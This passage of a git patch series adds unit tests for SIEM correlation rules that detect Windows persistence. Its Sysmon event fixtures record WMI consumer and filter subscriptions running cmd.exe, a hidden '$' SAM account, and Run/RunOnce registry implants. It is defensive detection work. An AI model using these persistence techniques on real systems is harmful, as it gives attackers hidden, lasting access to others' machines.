"365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} - -expect not {"correlation_name": "Impacket_WMIExec_Command_Executed"} From 12617455525a3e71a18f75a2a0e7747bfe0ab167 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:45:13 +0300 Subject: [PATCH 39/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Change?= =?UTF-8?q?=5Fwmi=5Fsubscription)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Change_wmi_subscription/tests/test_1.sc | 4 ++++ .../Change_wmi_subscription/tests/test_2.sc | 4 ++++ .../Change_wmi_subscription/tests/test_3.sc | 5 +++++ 3 files changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc new file mode 100644 index 00000000..874debb6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"20\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"20\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:23.340658\"},\"EventRecordID\":\"16111\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiConsumerEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:23.340\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Name\",\"text\":\"\\\"BotConsumer23\\\"\"},{\"Name\":\"Type\",\"text\":\"Command Line\"},{\"Name\":\"Destination\",\"text\":\"\\\"c:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\"\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_20_WMI_event_consumer_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "20", "normalized": true, "object": "resource", "object.name": "BotConsumer23", "object.state": "created", "object.storage.fullpath": "c:\\\\Windows\\\\System32\\\\cmd.exe", "object.storage.name": "cmd.exe", "object.storage.path": "c:\\\\Windows\\\\System32\\\\", "object.type": "Command Line", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T02:55:27.966Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:23.340Z", "type": "raw", "uuid": "fbcc62f0-3948-4a63-9c1f-2b899c9e9e0e"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> BotConsumer23: c:\\\\Windows\\\\System32\\\\cmd.exe", "alert.key": "BotConsumer23: c:\\\\Windows\\\\System32\\\\cmd.exe", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "20", "object": "resource", "object.name": "BotConsumer23", "object.storage.fullpath": "c:\\\\Windows\\\\System32\\\\cmd.exe", "object.storage.name": "cmd.exe", "object.storage.path": "c:\\\\Windows\\\\System32\\\\", "object.type": "Command Line", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc new file mode 100644 index 00000000..d4c61672 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"21\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"21\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:23.418783\"},\"EventRecordID\":\"16112\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiBindingEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:23.418\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Consumer\",\"text\":\"\\\"CommandLineEventConsumer.Name=\\\\\\\"BotConsumer23\\\\\\\"\\\"\"},{\"Name\":\"Filter\",\"text\":\"\\\"__EventFilter.Name=\\\\\\\"BotFilter82\\\\\\\"\\\"\"}]}}}", "datafield1": "BotConsumer23", "datafield2": "BotFilter82", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_21_WMI_event_consumer_to_filter_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "21", "normalized": true, "object": "link", "object.name": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"", "object.query": "__EventFilter.Name=\\\"BotFilter82\\\"", "object.state": "created", "object.type": "consumer-filter", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T02:55:27.970Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:23.418Z", "type": "raw", "uuid": "505b7ae4-ef8c-44a9-b0a4-2784cba74388"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> CommandLineEventConsumer.Name=\\\"BotConsumer23\\\" <-> __EventFilter.Name=\\\"BotFilter82\\\"", "alert.key": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\" <-> __EventFilter.Name=\\\"BotFilter82\\\"", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "datafield1": "BotConsumer23", "datafield2": "BotFilter82", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "21", "object": "link", "object.name": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"", "object.query": "__EventFilter.Name=\\\"BotFilter82\\\"", "object.type": "consumer-filter", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc new file mode 100644 index 00000000..0da3ace3 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"19\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"19\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:39.746908\"},\"EventRecordID\":\"16115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiFilterEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:39.746\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"EventNamespace\",\"text\":\"\\\"root\\\\\\\\cimv2\\\"\"},{\"Name\":\"Name\",\"text\":\"\\\"BotFilter82\\\"\"},{\"Name\":\"Query\",\"text\":\"\\\"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\\\"\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_19_WMI_event_filter_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "19", "normalized": true, "object": "resource", "object.fullpath": "root\\\\cimv2\\BotFilter82", "object.name": "BotFilter82", "object.path": "root\\\\cimv2", "object.query": "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", "object.state": "created", "object.type": "event filter", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T03:11:36.186Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:39.746Z", "type": "raw", "uuid": "3a47e9dc-79a2-4bb8-a2d7-7bd4d7a4ccd0"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> root\\\\cimv2\\BotFilter82: SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", "alert.key": "iewin7\\ieuserroot\\\\cimv2\\BotFilter82", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "19", "object": "resource", "object.fullpath": "root\\\\cimv2\\BotFilter82", "object.name": "BotFilter82", "object.path": "root\\\\cimv2", "object.query": "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", "object.type": "event filter", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser"} + From 22be1eabe344c1b7469437241f396c92c1697901 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:49:05 +0300 Subject: [PATCH 40/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create=5Fhidden=5Flocal?= =?UTF-8?q?=5Faccount)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Create_hidden_local_account/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc new file mode 100644 index 00000000..f58d174f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-12-18 17:56:07.017817\"},\"EventRecordID\":\"596571\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3552\",\"ThreadID\":\"5004\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Hidden Local Account Created\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2020-12-18 17:56:07.015\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-68dd-5fdd-0000-00101b660000}\"},{\"Name\":\"ProcessId\",\"text\":\"648\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\hideme0007$\\\\(Default)\"},{\"Name\":\"Details\",\"text\":\"Binary Data\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Hidden Local Account Created", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\(default)", "object.name": "(default)", "object.new_value": "binary data", "object.path": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:20:45.153Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-68dd-5fdd-0000-00101b660000", "subject.process.id": "648", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-12-18T17:56:07.015Z", "type": "raw", "uuid": "efed3400-e354-43cf-b6da-b6ed33f18c0d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "lsass.exe -> \\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "alert.key": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Create User", "correlation_name": "Create_hidden_local_account", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Hidden Local Account Created", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_hidden_local_account|msedgewin10|lsass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\(default)", "object.name": "(default)", "object.new_value": "binary data", "object.path": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-68dd-5fdd-0000-00101b660000", "subject.process.id": "648", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file From 9a58add51cfc5c408275ae1607edc1ce409e344d Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:01:43 +0300 Subject: [PATCH 41/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create?= =?UTF-8?q?=5Fpersist=5Fvia=5FHidden=5FRun=5Fkey=5Fvalue)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Create_persist_via_Hidden_Run_key_value/tests/test_1.sc | 5 +++++ .../Create_persist_via_Hidden_Run_key_value/tests/test_2.sc | 5 +++++ .../Create_persist_via_Hidden_Run_key_value/tests/test_3.sc | 5 +++++ 3 files changed, 15 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc new file mode 100644 index 00000000..fa399fcc --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-07-04T14:18:58.2687126Z\"},\"EventRecordID\":\"306346\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3400\",\"ThreadID\":\"4136\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Persistence - Hidden Run value detected\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2020-07-04 14:18:58.231\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-8fd2-5f00-0000-0010c15d2200}\"},{\"Name\":\"ProcessId\",\"text\":\"3728\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\Public\\\\tools\\\\evasion\\\\a.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\"},{\"Name\":\"Details\",\"text\":\"\\\"c:\\\\windows\\\\tasks\\\\taskhost.exe\\\"\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Persistence - Hidden Run value detected", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\tasks\\taskhost.exe\"", "object.path": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:17:17.180Z", "status": "success", "subject.process.fullpath": "c:\\users\\public\\tools\\evasion\\a.exe", "subject.process.guid": "747f3d96-8fd2-5f00-0000-0010c15d2200", "subject.process.id": "3728", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\public\\tools\\evasion\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-07-04T14:18:58.231Z", "type": "raw", "uuid": "7e5ba700-f8f5-4874-a4ac-2a91c9dddd47"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:30:51.2794969Z\"},\"EventRecordID\":\"48185854\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 18:30:51.264\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-645b-6487-ba09-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"2460\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\reg.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\CalcImplant\"},{\"Name\":\"Details\",\"text\":\"C:\\\\Windows\\\\System32\\\\calc.exe\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\runonce\\calcimplant", "object.name": "calcimplant", "object.new_value": "c:\\windows\\system32\\calc.exe", "object.path": "\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\runonce\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:17:17.180Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "c:\\windows\\system32\\reg.exe", "subject.process.guid": "2b856446-645b-6487-ba09-00000000c100", "subject.process.id": "2460", "subject.process.name": "reg.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:30:51.264Z", "type": "raw", "uuid": "b4349995-7d1f-4292-9177-fe3ed9b7436d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", 